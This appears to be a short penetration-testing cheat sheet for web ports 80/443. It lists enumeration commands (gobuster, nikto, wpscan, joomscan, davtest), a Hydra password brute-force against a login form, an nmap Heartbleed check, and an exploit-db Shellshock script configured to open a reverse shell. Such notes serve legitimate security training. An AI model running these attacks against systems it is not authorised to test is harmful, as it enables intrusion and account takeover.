Port 80/443 – HTTP/HTTPS

How to enumerate port 80/443 (HTTP/HTTPS)


Find hidden files and directories:

# Dirb


# Gobuster - remove relevant responde codes (403 for example)
gobuster -u -w /usr/share/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt -s '200,204,301,302,307,403,500' -e

Nikto web server scan:

nikto -h

WordPress scan:

wpscan -u

Joomla scan:

If you want to do a penetration test on a Joomla CMS, OWASP JoomScan is Your best shot ever!

joomscan -u


DAVTest tests WebDAV enabled servers by uploading test executable files, and then (optionally) uploading files which enable for command execution or other actions directly on the target. It is meant for penetration testers to quickly and easily determine if enabled DAV services are exploitable.

davtest -url

Cracking Web Forms with Hydra:

hydra -L <username list> -p <password list> <IP Address> <form parameters><failed login message>

For example:

hydra -L <wordlist> -P<password list> http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed"

SSL vulnerabilities:

Always check for SSL-vulnerabilities such as heartbleed.

nmap -sV --script=ssl-heartbleed


cgi-bin (ShellShock):

If you found the “cgi-bin” directory, try to brute force the files inside it because it might be vulnerable to shellshock vulnerability. You can exploit it like that in Apache (change the value of the pages with the discovered files):

python /usr/share/exploitdb/platforms/linux/remote/34900.py payload=reverse rhost= lhost= lport=4443 pages=/cgi-bin/user.sh


Leave A Reply

Your email address will not be published.